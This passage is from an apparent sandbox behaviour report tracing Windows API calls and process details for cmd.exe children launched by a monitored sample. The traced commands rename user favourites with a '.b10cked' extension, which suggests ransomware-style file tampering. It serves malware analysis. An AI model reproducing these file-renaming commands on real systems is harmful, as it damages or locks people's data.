lpFindFileData=0x2cf3e4 | out: lpFindFileData=0x2cf3e4) returned 0x4c0040 [0214.230] FindClose (in: hFindFile=0x4c0040 | out: hFindFile=0x4c0040) returned 1 [0214.231] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf3e4 | out: lpFindFileData=0x2cf3e4) returned 0x4c0040 [0214.231] FindClose (in: hFindFile=0x4c0040 | out: hFindFile=0x4c0040) returned 1 [0214.231] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0214.231] 
SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0214.231] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0214.231] GetEnvironmentStringsW () returned 0x4c2b20* [0214.231] FreeEnvironmentStringsW (penv=0x4c2b20) returned 1 [0214.231] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.232] GetConsoleOutputCP () returned 0x1b5 [0214.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.232] GetUserDefaultLCID () returned 0x409 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf7a8, cchData=128 | out: lpLCData="0") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf7a8, cchData=128 | out: lpLCData="0") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf7a8, cchData=128 | out: lpLCData="1") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0214.232] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: 
lpLCData="Sat") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0214.233] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0214.233] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0214.234] GetConsoleTitleW (in: lpConsoleTitle=0x4b0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.234] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0214.234] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0214.234] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0214.234] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0214.235] _wcsicmp (_String1="move", _String2=")") returned 68 [0214.235] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0214.235] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0214.235] _wcsicmp (_String1="IF", _String2="move") returned -4 [0214.235] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0214.235] _wcsicmp (_String1="REM", _String2="move") returned 5 [0214.235] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0214.238] GetConsoleTitleW (in: lpConsoleTitle=0x2cf4a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.239] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0214.239] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0214.239] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0214.239] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0214.239] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="CD") returned 10 
[0214.239] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="REN") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0214.239] _wcsicmp (_String1="move", _String2="SET") returned -6 [0214.239] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0214.239] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0214.239] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0214.239] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0214.239] _wcsicmp (_String1="move", _String2="MD") returned 11 [0214.239] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0214.239] _wcsicmp (_String1="move", _String2="RD") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0214.239] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0214.239] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0214.239] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0214.239] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0214.239] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0214.239] _wcsicmp (_String1="move", _String2="VER") returned -9 [0214.239] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0214.239] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0214.239] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0214.239] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0214.240] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0214.240] _wcsicmp (_String1="move", _String2="START") returned -6 [0214.240] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0214.240] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0214.240] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0214.241] GetDriveTypeW (lpRootPathName="C:\\") 
returned 0x3 [0214.241] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.241] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf25c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf254, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf254*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) 
returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.242] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.243] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.243] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0214.243] _wcsicmp (_String1="MICROS~1.URL", _String2=".") returned 63 [0214.243] _wcsicmp (_String1="MICROS~1.URL", _String2="..") returned 63 [0214.243] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~1.url")) returned 0x20 [0214.244] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c1e88 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.244] SetErrorMode (uMode=0x0) returned 0x0 [0214.244] SetErrorMode (uMode=0x1) returned 
0x0 [0214.244] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", nBufferLength=0x104, lpBuffer=0x2cebe4, lpFilePart=0x2cebcc | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", lpFilePart=0x2cebcc*="MICROS~1.URL") returned 0x2f [0214.244] SetErrorMode (uMode=0x0) returned 0x1 [0214.244] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0214.244] _wcsicmp (_String1="MICROS~1.URL", _String2=".") returned 63 [0214.244] _wcsicmp (_String1="MICROS~1.URL", _String2="..") returned 63 [0214.244] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~1.url")) returned 0x20 [0214.333] SetErrorMode (uMode=0x0) returned 0x0 [0214.333] SetErrorMode (uMode=0x1) returned 0x0 [0214.333] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", nBufferLength=0x104, lpBuffer=0x2cf060, lpFilePart=0x2cedf8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", lpFilePart=0x2cedf8*="MICROS~1.URL") returned 0x2f [0214.333] SetErrorMode (uMode=0x0) returned 0x1 [0214.333] SetErrorMode (uMode=0x0) returned 0x0 [0214.333] SetErrorMode (uMode=0x1) returned 0x0 [0214.333] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", nBufferLength=0x104, lpBuffer=0x2cf268, lpFilePart=0x2cedf8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", lpFilePart=0x2cedf8*="Microsoft Store.url.b10cked") returned 0x3e [0214.333] SetErrorMode (uMode=0x0) returned 0x1 [0214.333] SetLastError (dwErrCode=0x0) [0214.333] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url.b10cked")) returned 0xffffffff [0214.334] 
GetLastError () returned 0x2 [0214.334] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", fInfoLevelId=0x1, lpFindFileData=0x2ce774, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce774) returned 0x4b0ed8 [0214.334] FindNextFileW (in: hFindFile=0x4b0ed8, lpFindFileData=0x2ce774 | out: lpFindFileData=0x2ce774) returned 0 [0214.334] GetLastError () returned 0x12 [0214.334] FindClose (in: hFindFile=0x4b0ed8 | out: hFindFile=0x4b0ed8) returned 1 [0214.335] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL", fInfoLevelId=0x1, lpFindFileData=0x4c1c28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4c1c28) returned 0x4b0ed8 [0214.335] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", nBufferLength=0x104, lpBuffer=0x2cea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked", lpFilePart=0x0) returned 0x3e [0214.335] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url", nBufferLength=0x104, lpBuffer=0x2cea0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url", lpFilePart=0x0) returned 0x36 [0214.335] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url")) returned 0x20 [0214.335] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft store.url.b10cked"), dwFlags=0x3) returned 1 [0214.336] FindClose (in: hFindFile=0x4b0ed8 | out: hFindFile=0x4b0ed8) returned 1 [0214.336] 
_vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ce9c0 | out: _Buffer=" 1") returned 9 [0214.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.336] GetFileType (hFile=0x7) returned 0x2 [0214.336] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.336] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ce94c | out: lpMode=0x2ce94c) returned 1 [0214.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.336] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce980 | out: lpConsoleScreenBufferInfo=0x2ce980) returned 1 [0214.337] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.337] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce9c0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.337] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ce9a4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce9a4*=0x1a) returned 1 [0214.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.337] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.338] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.338] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.338] SetConsoleInputExeNameW () returned 0x1 [0214.338] GetConsoleOutputCP () returned 0x1b5 [0214.338] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.338] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.338] exit (_Code=0) Process: id = "528" image_name = 
"cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNAUT~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Autos.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31429 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31430 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31431 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31432 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 31433 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31434 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31435 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 
region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31436 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31437 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 31438 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31507 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31508 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31509 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31510 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 31511 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 31512 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31513 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31514 start_va = 0x76480000 end_va = 0x76489fff entry_point = 
0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31515 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31516 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31517 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31518 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31519 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31520 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31521 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 31522 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31523 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" 
(normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31524 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 31525 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 31526 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 31527 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 31528 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 31529 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 31530 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 729 os_tid = 0xa94 [0213.772] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af82c | out: lpSystemTimeAsFileTime=0x1af82c*(dwLowDateTime=0xb439da40, dwHighDateTime=0x1d440a9)) [0213.772] GetCurrentProcessId () returned 0x9b0 [0213.772] GetCurrentThreadId () returned 0xa94 [0213.772] GetTickCount () returned 0x3be5e [0213.772] QueryPerformanceCounter (in: lpPerformanceCount=0x1af824 | out: lpPerformanceCount=0x1af824*=27056140941) returned 1 [0213.773] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.773] __set_app_type (_Type=0x1) [0213.773] __p__fmode () returned 0x76b331f4 [0213.773] __p__commode () returned 0x76b331fc [0213.773] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.773] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: 
_Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.773] GetCurrentThreadId () returned 0xa94 [0213.774] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x38 [0213.774] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.774] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.774] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.774] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.774] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af7bc | out: phkResult=0x1af7bc*=0x0) returned 0x2 [0213.774] VirtualQuery (in: lpAddress=0x1af7f3, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.774] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af78c, dwLength=0x1c | out: lpBuffer=0x1af78c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, 
